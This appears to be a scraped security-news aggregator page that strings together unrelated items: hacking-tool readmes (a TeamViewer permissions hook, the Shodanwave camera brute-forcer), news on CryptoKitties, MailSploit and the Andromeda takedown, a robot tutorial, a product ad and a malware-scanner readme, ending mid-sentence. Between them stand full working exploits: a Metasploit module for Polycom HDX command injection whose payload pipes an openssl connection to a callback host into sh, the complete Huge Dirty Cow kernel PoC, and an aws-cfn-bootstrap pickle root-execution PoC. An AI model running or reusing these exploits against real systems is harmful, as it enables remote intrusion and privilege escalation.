Fi8sVrs

A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions. Features As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides. As the Client - Allows for control of mouse with disregard to servers current control settings and permissions. Demo Rundown Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes. Inject and follow the steps Requirements Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe" This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported) Disclaimer Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse. Credit @timse93 - Research and Testing Download: TeamViewer_Permissions_Hook_V1-master.zip Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1

Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', 'Description' => %q{ Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. }, 'Author' => [ 'Mumbai', # 'staaldraad', # https://twitter.com/_staaldraad/ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass 'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them ], 'References' => [ ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] ], 'DisclosureDate' => 'Nov 12 2017', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [[ 'Automatic', {} ]], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ]) end def check connect Rex.sleep(1) res = sock.get_once disconnect if !res && !res.empty? return Exploit::CheckCode::Unknown elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") end # # Obtain banner information # sock = connect Rex.sleep(2) banner = sock.get_once vprint_status("Received #{banner.length} bytes from service") vprint_line("#{banner}") if banner =~ /password/i print_status("Authentication enabled on device, authenticating with target...") if datastore['PASSWORD'].nil? print_error("#{peer} - Please supply a password to authenticate with") return end # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. sock.put("#{datastore['PASSWORD']}\n") res = sock.get_once if res =~ /Polycom/ print_good("#{peer} - Authenticated successfully with target.") elsif res =~ /failed/ print_error("#{peer} - Invalid credentials for target.") return end elsif banner =~ /Polycom/ # praise jesus print_good("#{peer} - Device has no authentication, excellent!") end do_payload(sock) end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" sock.put(cmd) if datastore['VERBOSE'] Rex.sleep(2) resp = sock.get_once vprint_status("Received #{resp.length} bytes in response") vprint_line(resp) end # Give time for our command to be queued and executed 1.upto(5) do Rex.sleep(1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == 'local' comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) self.service.on_client_connect_proc = proc { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.is_a?(Rex::Service) if self.service.is_a?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html

A new craze for virtual kittens is slowing down trade in one of the largest crypto-currencies. CryptoKitties lets players buy and breed "crypto-pets" on Ethereum's underlying blockchain network. The game's developers told the Bloomberg news agency that CryptoKitties was a "key step" to making blockchains more accessible. But its popularity has underscored one of the technology's biggest downsides: its lack of scalability. Etherscan has reported a sixfold increase in pending transactions on Ethereum since the game's release, by the Axiom Zen innovation studio, on 28 November. "CryptoKitties has become so popular that it's taking up a significant amount of available space for transactions on the Ethereum platform," said Garrick Hileman, from the Cambridge Centre for Alternative Finance. "Some people are concerned that a frivolous game is now going to be crowding out more serious, significant-seeming business uses." An estimated $4.5m (£3.35m) has been spent on the cartoon cats at the time of writing, according to Crypto Kitty Sales. CryptoKitties is the first game built on Ethereum What is a CryptoKitty? Think of these rather unpalatable cartoon kittens as unique digital Pokemon cards. The game's developers describe them as "breedable Beanie Babies", each with its own unique 256-bit genome. These crypto-collectibles are also gender-fluid, able to play the role of either the "dame" or the "sire" when bred together. The kitties' unique DNA can lead to four billion possible genetic variations. Some of the varieties created so far look lifelike, with grey striped fur and bulging green eyes. Others are speckled with neon-blue spots or magenta-patterned swirls. One of the less attractive CryptoKitties How much are CryptoKitties worth? At the time of writing, the median, or mid-range, price of a CryptoKitty is approximately $23.06 (£17.19), according to Crypto Kitty Sales. The game's top cat brought in $117,712.12 (£87,686.11) when it sold on Saturday, 2 December. How can I pay for my own litter? CryptoKitties can be bought using only Ether, a crypto-currency that acts as the fuel of the Ethereum blockchain network. To get started, users must install a Chrome extension called MetaMask, which acts as a digital wallet and lets players send and receive Ether from their computers. Ether must be purchased from a crypto-currency exchange before it can be added to MetaMask. The sale page for a CryptoKitty Where do the CryptoKitties come from? Axiom Zen releases a new CryptoKitty every 15 minutes, but the rest of the supply is powered by the breeding of existing crypto-pets. Owners of kittens can put them up for sale and set their own price in ethers. Why does it matter if CryptoKitties is slowing down Ethereum? According to ETH Gas Station, the CryptoKitties game accounts for over 10% of network traffic on Ethereum. As traffic increases, transactions become more expensive to execute quickly. "The real big issue is other major players looking for alternatives to Ethereum and moving to different systems," Mr Hileman said. "There's definitely an urgency for Ethereum to try and address this issue." Via bbc.com

Shodanwave Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online. What does the tool to? Look, a list! Search Brute force SSID and WPAPSK Password Disclosure E-mail, FTP, DNS, MSN Password Disclosure Exploit This is an example of shodan wave running, the password was not found through raw force so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory. Demo https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1 How to use? To use shodanwave you need an api key which you can get for free at https://www.shodan.io/, then you need to follow the next steps. Installation $ cd /opt/ $ git clone https://github.com/fbctf/shodanwave.git $ cd shodanwave $ pip install -r requirements.txt Usage Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Default Netwave IP Camera -u USERNAME, --username USERNAME Select your usernames wordlist -w PASSWORD, --wordlist PASSWORD Select your passwords wordlist -k ADDRESS, --shodan ADDRESS Shodan API key -l LIMIT, --limit LIMIT Limit the number of registers responsed by Shodan -o OFFSET, --offset OFFSET Shodan skips this number of registers from response -t OUTPUT, --output OUTPUT Save the results Attention Use this tool wisely and not for evil. To get the best performece of this tool you need to pay for shodan to get full API access Options --limit and --offset may need a paying API key and consume query credits from your Shodan account. Disclaimer Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code. Download: sodanwave-master.zip git clone https://github.com/evilsocketbr/shodanwave.git Source: https://github.com/evilsocketbr/shodanwave

If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system. A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms. Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others. Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse "From" header. Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with the forged sender address to trick recipients into believing they are receiving that email from a specific person. In a dedicated website went up today, Haddouche explained how the lack of input sanitization implemented by vulnerable email clients could lead to email spoofing attack—without actually exploiting any flaw in DMARC. To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to President of the United States. "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post. "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms." Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stems from the email spoofing issue. Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to MailSploit attack. However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 12 vendors did not yet comment on the researcher's report. Via thehackernews.com

In this advanced project with the GoPiGo3 we build a Browser video streaming robot which streams live video to a browser and can be controlled from the browser. In this project we use a the Raspberry Pi Camera module with the GoPiGo3. You can control the robot using the a controller on the browser as the live video streams directly on the browser. The video quality is very good and the latency of the video is low, making this ideal for live video streaming robot projects. Hardware Needed A fully assembled GoPiGo3 A Raspberry Pi A Raspberry Pi Camera Module Connecting the Camera module Attach the Raspberry Pi camera module to the port on the Raspberry Pi. For more details on how to attach the camera, see our tutorial here. Setting up the GoPiGo Video Streaming Robot You should have cloned the GoPiGo3 github code onto your Raspberry Pi. Install the Pi Camera dependencies and Flask by running the install.sh script: sudo bash install.sh Reboot your Pi. Setup to Run on Boot You can run the server on boot so you don’t have to run it manually. Use the command install_startup.sh and this should start the flask server on boot. You should be able to connect to the robot using “http://dex.local:5000” or if using the Cinch setup, you can use “http://10.10.10.10:5000” You can setup Cinch, which will automatically setup a wifi access point, with the command sudo bash /home/pi/di_update/Raspbian_For_Robots/upd_script/wifi/cinch_setup.sh On reboot, connect to the WiFi service “Dex”. Running the Project Start the server by typing the following command: sudo python3 flask_server.py It’s going to take a couple of seconds for the server to fire up. A port and address will be shown in there. By default, the port is set to 5000 . If you have Raspbian For Robots installed, then going to http://dex.local:5000 address will be enough. Be sure you have your mobile device / laptop on the same network as your GoPiGo3 Otherwise, you won’t be able to access it. Source: https://www.dexterindustries.com/GoPiGo/projects/python-examples-for-the-raspberry-pi/browser-video-streaming-robot-gopigo3/

Still using FTP? Truck hauls data 30x faster thanks to its modern rsync engine (included) which compresses, de-duplicates and encrypts – giving significantly higher performance and security, right from the first transfer. Setup takes 3 clicks (no command line), then just drag-and-drop to transfer. Unlock the performance of rsync with the simplicity of Truck. Jump to Videos | Screenshots | Features | Download now – free trial included Benchmarks 18x faster – uploading a new installation of WordPress. 30x faster – downloading a used instance of WordPress. 12x faster – sending an app to another computer in the office. No data was pre-existing at the destination, these were all first-time transfers – all gains are thanks to rsync’s compression and de-duplication. Comparisons were made versus the fastest FTP and SFTP apps for Mac, and native SMB sharing. Download now – free trial included Videos Screenshots Features – Upload and download via rsync by dragging-and-dropping. – Browse, rename, copy, move and delete remote files very quickly and easily. – Works over a securely encrypted SSH tunnel (no setup required). – Includes rsync 3.1.2 (no command-line interaction required). – Connects to any remote machine. – Checkboxes to quickly enable rsync’s most powerful features – such as backups/version-controlling, bandwidth-management, retention of partial transfers, etc. – Push-update the remote system’s version of rsync (includes precompiled binaries to suit a variety of remote machines). – Advanced GUI controls to selectively tune over 125 other rsync options. Even application-defined defaults can be overridden for a near-command-line level of control. – Autocompletion and inline documentation provided for each option. – Specify when the option applies (e.g. when uploading/downloading/both). – Enable ‘scavenging’: a preference to boost transfers by systematically employing rsync’s –copy-dest option; essentially reusing data from existing files in recently-visited directories. Fuzzy matching means that even files that are non-identical can be used as a basis for boosting. – Filter rules to include/exclude items based on text matching (or advanced pattern matching). – Toggle visibility of hidden files. – Specify ‘initial paths’ – for connecting straight into the given directory. – Fine tune custom preferences for each direction (upload/download) for each server. – Save multiple Favourites and work with multiple servers in multiple windows. – Bonjour browsing to easily connect to servers found nearby. – Use your SSH RSA private key instead of a password to connect to AWS, Google Cloud, etc. – An ‘Open Terminal Here’ action to quickly jump into an SSH session in Terminal.app – pre-authenticated and ready in the right directory. – Detailed operation logging. – Filter any view of files and use the keyboard to navigate. Certified for use with: – Google Cloud. – Amazon AWS. – Dreamhost. – (And works with any other service provider offering standard rsync-over-SSH.) Other features in the pipe: – Native rsync protocol support (in addition to the current rsync-over-ssh). – Scheduled transfers. – A ‘get info’ panel with full support for ownership and permissions management. – A history panel with granular operation logging. System Requirements Compatible with: – Mac OS X 10.8 (Mountain Lion and Mountain Lion Server) – Mac OS X 10.9 (Mavericks and Mavericks Server) – Mac OS X 10.10 (Yosemite and Yosemite Server) – Mac OS X 10.11 (El Capitan and El Capitan Server) – macOS 10.12 (Sierra and Sierra Server) – macOS 10.13 (High Sierra and High Sierra Server) The remote machine must have a running SSH service and carry its own copy of rsync. Macs have this as standard. Therefore, to connect to a remote Mac, simply enable ‘Remote Login’ in its System Preferences. Download Click here to download (21MB) – free trial included. Source: http://bonhardcomputing.com/truck/#2017-12-04

https://n0where.net/all-the-best-cyber-monday-black-friday-deals/

On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners, dismantled one of the longest running malware families in existence called Andromeda (also known as Gamarue). This widely distributed malware created a network of infected computers called the Andromeda botnet[1] . According to Microsoft, Andromeda’s main goal was to distribute other malware families. Andromeda was associated with 80 malware families and, in the last six months, it was detected on or blocked an average of over 1 million machines every month. Andromeda was also used in the infamous Avalanche network, which was dismantled in a huge international cyber operation in 2016. Steven Wilson, the Head of Europol’s European Cybercrime Centre: “This is another example of international law enforcement working together with industry partners to tackle the most significant cyber criminals and the dedicated infrastructure they use to distribute malware on a global scale. The clear message is that public-private partnerships can impact these criminals and make the internet safer for all of us.” One year ago, on 30 November 2016, after more than four years of investigation, the Public Prosecutor’s Office Verden and the Luneburg Police in Germany, the United States Attorney’s Office for the Western District of Pennsylvania, the Department of Justice, the FBI, Europol, Eurojust and global partners, had dismantled the international criminal infrastructure Avalanche. This was used as a delivery platform to launch and manage mass global malware attacks such as Andromeda, and money mule recruitment campaigns. Insights gained during the Avalanche case by the investigating German law enforcement entities were shared, via Europol, with the FBI and supported this year’s investigations to dismantle the Andromeda malware last week. Jointly, the international partners took action against servers and domains, which were used to spread the Andromeda malware. Overall, 1500 domains of the malicious software were subject to sinkholing[2] . According to Microsoft, during 48 hours of sinkholing, approximately 2 million unique Andromeda victim IP addresses from 223 countries were captured. The involved law enforcement authorities also executed the search and arrest of a suspect in Belarus. Simultaneously, the German sinkhole measures of the Avalanche case have been extended by another year. An extension of this measure was necessary, as globally 55 per cent of the computer systems originally infected in Avalanche are still infected today. The measures to combat the malicious Andromeda software as well as the extension of the Avalanche measures involved the following EU Member States: Austria, Belgium, Finland, France, Italy, the Netherlands, Poland, Spain, the United Kingdom, and the following non-EU Member States: Australia, Belarus, Canada, Montenegro, Singapore and Taiwan. The operation was supported by the following private and institutional partners: Shadowserver Foundation, Microsoft, Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI). The operation was coordinated from the command post hosted at Europol’s HQ. [1] Botnets are networks of computers infected with malware, which are under the control of a cybercriminal. Botnets allow criminals to harvest sensitive information from infected computers, such as online banking credentials and credit card information. A criminal can also use a botnet to perform cyberattacks on other computer systems, such as denial-of-service attacks. [2] Sinkholing is an action whereby traffic between infected computers and a criminal infrastructure is redirected to servers controlled by law enforcement authorities and/or an IT security company. This may be done by assuming control of the domains used by the criminals or IP addresses. When employed at a 100% scale, infected computers can no longer reach the criminal command-and-control computer systems and criminals can therefore no longer control the infected computers. The sinkholing infrastructure captures victims’ IP addresses, which can subsequently be used for notification and follow-up through dissemination to National CERTs and network owners. Crime areas Source: Cybercrime Forgery of Administrative Documents and Trafficking therein

"Huge Dirty Cow" POC A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here. Before running, make sure to set transparent huge pages to "always": echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled Download HugeDirtyCowPOC-master.zip mirror: // // The Huge Dirty Cow POC. This program overwrites the system's huge zero page. // Compile with "gcc -pthread main.c" // // November 2017 // Bindecy // #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sched.h> #include <string.h> #include <pthread.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define MAP_BASE ((void *)0x4000000) #define MAP_SIZE (0x200000) #define MEMESET_VAL (0x41) #define PAGE_SIZE (0x1000) #define TRIES_PER_PAGE (20000000) struct thread_args { char *thp_map; char *thp_chk_map; off_t off; char *buf_to_write; int stop; int mem_fd1; int mem_fd2; }; typedef void * (*pthread_proc)(void *); void *unmap_and_read_thread(struct thread_args *args) { char c; int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. memcpy(&c, args->thp_map + args->off, sizeof(c)); read(args->mem_fd2, &c, sizeof(c)); lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); usleep(10); // We placed the zero page and marked its PMD as dirty. // Give get_user_pages() another chance before madvise()-ing again. } return NULL; } void *write_thread(struct thread_args *args) { int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); } return NULL; } void *wait_for_success(struct thread_args *args) { while (args->thp_chk_map[args->off] != MEMESET_VAL) { madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); sched_yield(); } args->stop = 1; return NULL; } int main() { struct thread_args args; void *thp_chk_map_addr; int ret; // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_map == MAP_FAILED) { perror("[!] mmap()"); return -1; } if (args.thp_map != MAP_BASE) { fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); goto err_unmap1; } printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_chk_map == MAP_FAILED) { perror("[!] mmap()"); goto err_unmap1; } if (args.thp_chk_map != thp_chk_map_addr) { fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); goto err_unmap2; } ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); if (ret) { perror("[!] madvise()"); goto err_unmap2; } args.buf_to_write = malloc(PAGE_SIZE); if (!args.buf_to_write) { perror("[!] malloc()"); goto err_unmap2; } memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); args.mem_fd1 = open("/proc/self/mem", O_RDWR); if (args.mem_fd1 < 0) { perror("[!] open()"); goto err_free; } args.mem_fd2 = open("/proc/self/mem", O_RDWR); if (args.mem_fd2 < 0) { perror("[!] open()"); goto err_close1; } printf("[*] Racing. Gonna take a while...\n"); args.off = 0; // Overwrite every single page while (args.off < MAP_SIZE) { pthread_t threads[3]; args.stop = 0; ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); if (ret) { perror("[!] pthread_create()"); goto err_close2; } pthread_join(threads[0], NULL); // This call will return only after the overwriting is done pthread_join(threads[1], NULL); pthread_join(threads[2], NULL); args.off += PAGE_SIZE; printf("[*] Done 0x%lx bytes\n", args.off); } printf("[*] Success!\n"); err_close2: close(args.mem_fd2); err_close1: close(args.mem_fd1); err_free: free(args.buf_to_write); err_unmap2: munmap(args.thp_chk_map, MAP_SIZE); err_unmap1: munmap(args.thp_map, MAP_SIZE); if (ret) { fprintf(stderr, "[!] Exploit failed.\n"); } return ret; } Source: https://github.com/bindecy/HugeDirtyCowPOC

masc A malware (web) scanner developed during CyperCamp Hackathon 2017 About homepage PyPI Features Scan any website for malware using OWASP WebMalwareScanner checksum and YARA rules databases Perform some cleaning operations to improve website protection Monitor the website for changes. Details are written in a log file Custom website support Scan your site to know if it has been infected with some malware List your local backups Logging support Backup your site Restore website WordPress support Scan your site to know if it has been infected with some malware Scan for suspect files and compare with a clean installation Clean up your site to avoid giving extra information to attackers Backup your site (to recover later if you need) List your local backups Logging support Restore website Requirements First of all, notice that this tool is developed under Linux and, at the moment, it has been tested only under this Operating System Python >= 3 Some Python libraries python-magic yara-python watchdog termcolor santi@zenbook:$ pip3 install python-magic yara-python watchdog termcolor Notice masc is developed under Linux and it has not been tested under any other Operating System. Anyway, it should run without problems under any Unix-friendly OS. In particular, in Mac OSX I have noticed it's neccesary to install Homebrew to use python-magic library propery as _libmagic. Check first the previous link to the brew homepage and then you will be able to install as I show below: santi@zenbook:$ brew install libmagic Installtaion To install masc on your computer, you can download a release, untar it and try. You can also install it usign pip ('pip3 install masc') Usage masc 0.1 (http://github.com/sfaci/masc) usage: masc.py [-h] [--add-file FILENAME] [--add-word STRING] [--clean-cache] [--clean-site] [--list-backups] [--list-logs] [--make-backup] [--monitor] [--name NAME] [--rollback] [--scan PATH] [--site-type {wordpress,drupal,custom}] optional arguments: -h, --help show this help message and exit --add-file FILENAME Add a suspect file to the dictionary --add-word STRING Add a suspect content to the dictionary --clean-cache Clean masc cache (cache and logs files, NO backups) --clean-site Clean up the site to hide information to attackers --list-backups List local backups --make-backup Create a local backup of the current installation --monitor Monitor site to detect changes --name NAME Name assigned to the scanned installation --rollback Restore a local backup --scan PATH Scan an installation at the given PATH --site-type {wordpress,drupal,custom} which type of web you want to scan:: wordpress, joomla, drupal or magento Test There is a repository in the Docker Hub to perform tests masc-wordpress Documentation You can find a complete tutorial about how to use masc in the wiki Thanks Thanks to OWASP WebMalwareScanner for some ideas and the signatures databases with checksums and YARA rules (and how to load it to work with). Author Santiago Faci santiago.faci@gmail.com Download: masc-master.zip or git clone https://github.com/sfaci/masc.git Source: https://sfaci.github.io/masc/

aws-cfn-bootstrap versions prior to 1.4-22.14 suffer from a local code execution vulnerability. aws-cfn-bootstrap local code execution as root ============================================== The latest version of this advisory is available at: https://sintonen.fi/advisories/aws-cfn-bootstrap-local-code-execution-as-root.txt Overview -------- AWS EC2 instances deployed with the AWS CloudFormation bootstrap contain a vulnerable daemon that enables an attacker to execute arbitrary code as root. Description ----------- The aws-cfn-bootstrap `cfn-hup` daemon contains a local code execution vulnerability. A non-privileged attacker with the capability to write files (either locally or remotely) can write a specially crafted file which will result in arbitrary code execution as root. Impact ------ The non-privileged attacker is able to execute arbitrary commands as the administrative user (root). This leads to complete loss of confidentiality, integrity and availability. Details ------- The discovered vulnerability, described in more detail below, enables multiple independent attacks described here in brief: Local Arbitrary Code Execution As Root -------------------------------------- A local user can overwrite or replace a file with a specially crafted contents that results in a code execution as root. The code execution is limited to local users, unless a remotely accessible service contains an arbitrary file write vulnerability in which case the combined result is a remote code execution as root. Information Leak ---------------- A local user can read the metadata_db file. This file typically contains cleartext passwords and other similar confidential information. The confidential data is exposed to local users, but if a remotely accessible service contains an arbitrary file read vulnerability in which case the information is obviously exposed to external attackers as well. [CVE-2017-9450] Incorrect Permission Assignment for Critical Resource (CWE-732) ------------------------------------------------------------------------------- The `cfn-hup` daemon of the `aws-cfn-bootstrap` package is running with umask 0. This happens because /opt/aws/bin/cfn-hup does not set a secure umask for the `DaemonContext` class of the `python-daemon` package: with daemon.DaemonContext(pidfile=pidlockfile.TimeoutPIDLockFile('/var/run/cfn-hup.pid', 300), signal_map={signal.SIGTERM : kill}): The `python-daemon` package defaults to a umask of 0 as seen in https://pagure.io/python-daemon/blob/master/f/daemon/daemon.py : `umask` :Default: ``0`` File access creation mask ("umask") to set for the process on daemon start. A daemon should not rely on the parent process's umask value, which is beyond its control and may prevent creating a file with the required access mode. So when the daemon context opens, the umask is set to an explicit known value. If the conventional value of 0 is too open, consider setting a value such as 0o022, 0o027, 0o077, or another specific value. Otherwise, ensure the daemon creates every file with an explicit access mode for the purpose. Any file or directory created by the daemon will thus use the mask as specified by the `mkdir` or `open` functions. The code in /usr/lib/python2.7/dist-packages/cfnbootstrap/update_hooks.py does the following: def _create_storage_dir(self): if os.name == 'nt': self.storage_dir = os.path.expandvars(r'${SystemDrive}\cfn\cfn-hup\data') else: self.storage_dir = '/var/lib/cfn-hup/data' if not os.path.isdir(self.storage_dir): log.debug("Creating %s", self.storage_dir) try: os.makedirs(self.storage_dir) Since `os.makedirs` defaults to mode 777 the resulting directories /var/lib/cfn-hup and /var/lib/cfn-hup/data will have permissions 777 (`rwxrwxrwx`), that is, the directories are world-writable. The CFN hook processing code reads the file `metadata_db` with the Python `shelve` module: def process(self): with contextlib.closing(shelve.open('%s/metadata_db' % self.dir)) as shelf: self._resource_cache = {} for hook in self.hooks: try: self._process_hook(hook, shelf) And: def _process_hook(self, hook, shelf): try: new_data = self._retrieve_path_data(hook.path) except InFlightStatusError: return old_data = shelf.get(hook.name + "|" + hook.path, None) The `shelve` module comes with a fat warning about possible arbitrary code execution: > Warning: Because the shelve module is backed by pickle, it is insecure to load a shelf from an untrusted source. Like with pickle, loading a shelf can execute arbitrary code. Since any user can write to the /var/lib/cfn-hup/data/metadata_db file and the `cfn-hup` daemon is running as root, any user can execute arbitrary commands as root. A proof of concept exploit: #!/usr/bin/env python import os import shelve class E(object): def __reduce__(self): return (os.system, ('id >/pwned',)) s = shelve.open('/var/lib/cfn-hup/data/metadata_db') for k in s.keys(): s[k] = E() s.close() The vulnerable code is executed every 15 minutes. So by average it takes 450 seconds for the exploit to get triggered. The exploit is also executed when the daemon is started (for example at system boot). Reproducing ----------- 1. Sign in to AWS. 2. From AWS Console "Management Tools" select "CloudFormation". 3. Select "Create Stack". 4. Select eg. the template "LAMP Stack". 5. Fill the relevant fields. Note to select the EC2 keypair to use for access. 6. Leave other options as-is. 7. Click "Create". 8. Once running, ssh to the box with the EC2 keypair as `ec2-user`. 9. Upload the PoC to the host and execute it. 10. Wait at most 15 minutes for the /pwned file to appear. Vulnerable instances -------------------- Any AWS EC2 instances that has been deployed with a CloudFormation template that has the aws-cfn-bootstrap package 1.4-15.9.amzn1 and at least one hook included (for example `cfn-auto-reloader-hook`). This includes, but is not limited to, the AWS CloudFormation default LAMP, Rails and WordPress templates. Hooks with the `on.command` trigger don't result in code execution. Some earlier versions of aws-cfn-bootstrap might have also had such vulnerability for `on.command` triggers, as well. The history of this vulnerability and affected package versions are unclear, but the vulnerability is believed to have existed at least since 2011. As such the number of vulnerable systems 